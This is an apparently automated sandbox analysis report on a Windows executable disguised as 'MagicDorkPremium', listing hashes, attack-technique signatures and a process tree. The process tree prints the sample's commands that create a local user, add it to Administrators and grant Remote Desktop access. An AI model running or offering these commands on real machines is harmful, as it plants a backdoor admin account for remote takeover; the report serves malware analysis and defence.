Analysis
-
max time kernel
148s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
04-12-2024 13:09
Static task
static1
Behavioral task
behavioral1
Sample
MagicDorkPremiumv3.4.5.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
MagicDorkPremiumv3.4.5.exe
Resource
win10v2004-20241007-en
General
-
Target
MagicDorkPremiumv3.4.5.exe
-
Size
8KB
-
MD5
bc4bc3abc2a6c7008ba586394e653f6a
-
SHA1
a213a27ad4d756506e7a8b581ee6686031c70610
-
SHA256
90df211fe009f950d2f0a903bf2a2e609788b2d9d5183a28aab02c528ee8d505
-
SHA512
e52a45671658725444e3b6cb72547f942b831274980f239f8e6a7899dd9506538ccd3616532f1492a94c1f47a2c09fd9f88480f615da61039fa604223f280b8d
-
SSDEEP
96:yp+bNXPhviNjOi4cBmdjS+d579i9bm605/ltk+Vdc0M1ks5OaczNtK:ykZXRikFdm+f96bmzZNdfMOs1m
Malware Config
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Remote Service Session Hijacking: RDP Hijacking 1 TTPs 1 IoCs
Adversaries may hijack a legitimate user's remote desktop session to move laterally within an environment.
pid Process 3912 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation MagicDorkPremiumv3.4.5.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
-
System Location Discovery: System Language Discovery 1 TTPs 12 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MagicDorkPremiumv3.4.5.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 1772 timeout.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 1888 powershell.exe 1888 powershell.exe 5112 powershell.exe 5112 powershell.exe 3912 powershell.exe 3912 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 1888 powershell.exe Token: SeDebugPrivilege 5112 powershell.exe Token: SeDebugPrivilege 3912 powershell.exe Token: SeDebugPrivilege 1940 MagicDorkPremiumv3.4.5.exe -
Suspicious use of WriteProcessMemory 33 IoCs
description pid Process procid_target PID 1940 wrote to memory of 1888 1940 MagicDorkPremiumv3.4.5.exe 83 PID 1940 wrote to memory of 1888 1940 MagicDorkPremiumv3.4.5.exe 83 PID 1940 wrote to memory of 1888 1940 MagicDorkPremiumv3.4.5.exe 83 PID 1888 wrote to memory of 2252 1888 powershell.exe 85 PID 1888 wrote to memory of 2252 1888 powershell.exe 85 PID 1888 wrote to memory of 2252 1888 powershell.exe 85 PID 2252 wrote to memory of 4684 2252 net.exe 86 PID 2252 wrote to memory of 4684 2252 net.exe 86 PID 2252 wrote to memory of 4684 2252 net.exe 86 PID 1940 wrote to memory of 5112 1940 MagicDorkPremiumv3.4.5.exe 87 PID 1940 wrote to memory of 5112 1940 MagicDorkPremiumv3.4.5.exe 87 PID 1940 wrote to memory of 5112 1940 MagicDorkPremiumv3.4.5.exe 87 PID 5112 wrote to memory of 636 5112 powershell.exe 89 PID 5112 wrote to memory of 636 5112 powershell.exe 89 PID 5112 wrote to memory of 636 5112 powershell.exe 89 PID 636 wrote to memory of 3716 636 net.exe 90 PID 636 wrote to memory of 3716 636 net.exe 90 PID 636 wrote to memory of 3716 636 net.exe 90 PID 1940 wrote to memory of 3912 1940 MagicDorkPremiumv3.4.5.exe 91 PID 1940 wrote to memory of 3912 1940 MagicDorkPremiumv3.4.5.exe 91 PID 1940 wrote to memory of 3912 1940 MagicDorkPremiumv3.4.5.exe 91 PID 3912 wrote to memory of 3432 3912 powershell.exe 93 PID 3912 wrote to memory of 3432 3912 powershell.exe 93 PID 3912 wrote to memory of 3432 3912 powershell.exe 93 PID 3432 wrote to memory of 4088 3432 net.exe 94 PID 3432 wrote to memory of 4088 3432 net.exe 94 PID 3432 wrote to memory of 4088 3432 net.exe 94 PID 1940 wrote to memory of 1152 1940 MagicDorkPremiumv3.4.5.exe 97 PID 1940 wrote to memory of 1152 1940 MagicDorkPremiumv3.4.5.exe 97 PID 1940 wrote to memory of 1152 1940 MagicDorkPremiumv3.4.5.exe 97 PID 1152 wrote to memory of 1772 1152 cmd.exe 99 PID 1152 wrote to memory of 1772 1152 cmd.exe 99 PID 1152 wrote to memory of 1772 1152 cmd.exe 99
Processes
-
C:\Users\Admin\AppData\Local\Temp\MagicDorkPremiumv3.4.5.exe"C:\Users\Admin\AppData\Local\Temp\MagicDorkPremiumv3.4.5.exe"1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1940 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" net user ThanksEgalsa ThanksEgalsa /add2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1888 -
C:\Windows\SysWOW64\net.exe"C:\Windows\system32\net.exe" user ThanksEgalsa ThanksEgalsa /add3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2252 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user ThanksEgalsa ThanksEgalsa /add4⤵
- System Location Discovery: System Language Discovery
PID:4684
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" net localgroup administrators ThanksEgalsa /add2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5112 -
C:\Windows\SysWOW64\net.exe"C:\Windows\system32\net.exe" localgroup administrators ThanksEgalsa /add3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:636 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup administrators ThanksEgalsa /add4⤵
- System Location Discovery: System Language Discovery
PID:3716
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" net localgroup "Remote Desktop Users" ThanksEgalsa /add2⤵
- Remote Service Session Hijacking: RDP Hijacking
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3912 -
C:\Windows\SysWOW64\net.exe"C:\Windows\system32\net.exe" localgroup Remote Desktop Users ThanksEgalsa /add3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3432 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Remote Desktop Users ThanksEgalsa /add4⤵
- System Location Discovery: System Language Discovery
PID:4088
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp885A.tmp.cmd""2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1152 -
C:\Windows\SysWOW64\timeout.exetimeout 43⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:1772
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD533b19d75aa77114216dbc23f43b195e3
SHA136a6c3975e619e0c5232aa4f5b7dc1fec9525535
SHA256b23ced31b855e5a39c94afa1f9d55b023b8c40d4dc62143e0539c6916c12c9d2
SHA512676fa2fd34878b75e5899197fe6826bb5604541aa468804bc9835bd3acabed2e6759878a8f1358955413818a51456816e90f149133828575a416c2a74fc7d821
-
Filesize
11KB
MD54f6cd3de1e0b34a0183daea40ed1e735
SHA12fb1dd697a00304240b85a46b300d4a076469098
SHA256e1ea14aa026f7253ad3c75d5b5c11bfd738bf7641b492785eb9b0bd7610e995f
SHA5127c113367eecdf2f3100e79cbaabf41c967406647e7d28c9dab6292ec520c560ab4b451673c72460206bafc18815342426e19e8b8637433c243f95c5abd7e603b
-
Filesize
11KB
MD5c97eb6343a57bfbb90125cda5e62e1e0
SHA1de40b2a4f48e7ded3bf79e6079fa50dbb371ab8d
SHA25684d18825058af53ab416788233ae7489c0f1a9c041bfff9ae3da4c6003fc9cc4
SHA512266e9dd60f4107af340693009b54a4bbd9ad22dbb97a8451709b1f6eaec50ab114e24be3ebf3e580a97bb16a890890a66afda42e0a424d7caca50501f1d78cdb
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
168B
MD589e89c6704523adc865dcef0a9df2809
SHA1b8439be6fb4a83a10f4246cd4ef8aeb5a5bd6276
SHA25697f37a855fc6248b7cb906ca33830e0dd945d29630af0674bfe9aa6f02fc4f72
SHA5124f15352d8b6abcafc09c1ef64ef350b1ae0136fca2b3bf648f79134cfcfa8770de3b5735a0008bdaebf3e416a070f0a876f7fc88a11feb6e7a1047a6e27467ee